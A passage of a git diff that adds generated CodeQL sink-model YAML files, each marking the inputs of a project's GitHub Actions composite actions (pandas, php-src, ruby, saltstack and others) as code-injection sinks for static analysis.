"generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml new file mode 100644 index 00000000000..a0b7bca54ad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml new file mode 100644 index 00000000000..816a18fe73b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml new file mode 100644 index 00000000000..bf8cbfc01e0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] + - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml new file mode 100644 index 00000000000..bf88ed5c0a1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml new file mode 100644 index 00000000000..05c2a1cfaf6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml new file mode 100644 index 00000000000..46a8fd4fb8b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml new file mode 100644 index 00000000000..32467f8c3f2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] + - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml new file mode 100644 index 00000000000..3f4cc69ba75 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml new file mode 100644 index 00000000000..8b8ebf88b46 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml new file mode 100644 index 00000000000..4bc0d5f660d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml new file mode 100644 index 00000000000..5f38860c86d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml new file mode 100644 index 00000000000..8b45d92a5e0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml new file mode 100644 index 00000000000..7767c649780 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml new file mode 100644 index 00000000000..419909764b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 00000000000..6e2b5247f29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml new file mode 100644 index 00000000000..d012a6f2fbb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml new file mode 100644 index 00000000000..aead619b40b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml new file mode 100644 index 00000000000..b82360205f7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["primer/react", "*", "inputs.token", "code-injection", "generated"] + - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml new file mode 100644 index 00000000000..e5fad4e5256 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml new file mode 100644 index 00000000000..71f90682b1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml new file mode 100644 index 00000000000..07421b98859 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml new file mode 100644 index 00000000000..81fbb3ae9e4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml new file mode 100644 index 00000000000..9587351ce1d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml new file mode 100644 index 00000000000..080835504a6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml new file mode 100644 index 00000000000..86ce393fbc5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml new file mode 100644 index 00000000000..182558589d7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml new file mode 100644 index 00000000000..1839670baa2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml new file mode 100644 index 00000000000..203dabaa3b9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml new file mode 100644 index 00000000000..7247d125324 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml new file mode 100644 index 00000000000..22c8a56deac --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] + - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml new file mode 100644 index 00000000000..7476425a35f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml new file mode 100644 index 00000000000..3c96c1b159d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml new file mode 100644 index 00000000000..da9def79964 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml new file mode 100644 index 00000000000..80c91739684 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml new file mode 100644 index 00000000000..2121bb23710 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml new file mode 100644 index 00000000000..f0acc305672 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml new file mode 100644 index 00000000000..f099314b16e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml new file mode 100644 index 00000000000..971cd92e3cd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml new file mode 100644 index 00000000000..42aba6b02dd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml new file mode 100644 index 00000000000..71d71f6cb21 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml new file mode 100644 index 00000000000..60a29d3edf7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml new file mode 100644 index 00000000000..84d174e5a05 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml new file mode 100644 index 00000000000..5cc3a3a7475 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml new file mode 100644 index 00000000000..cee842ae1c6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] + - 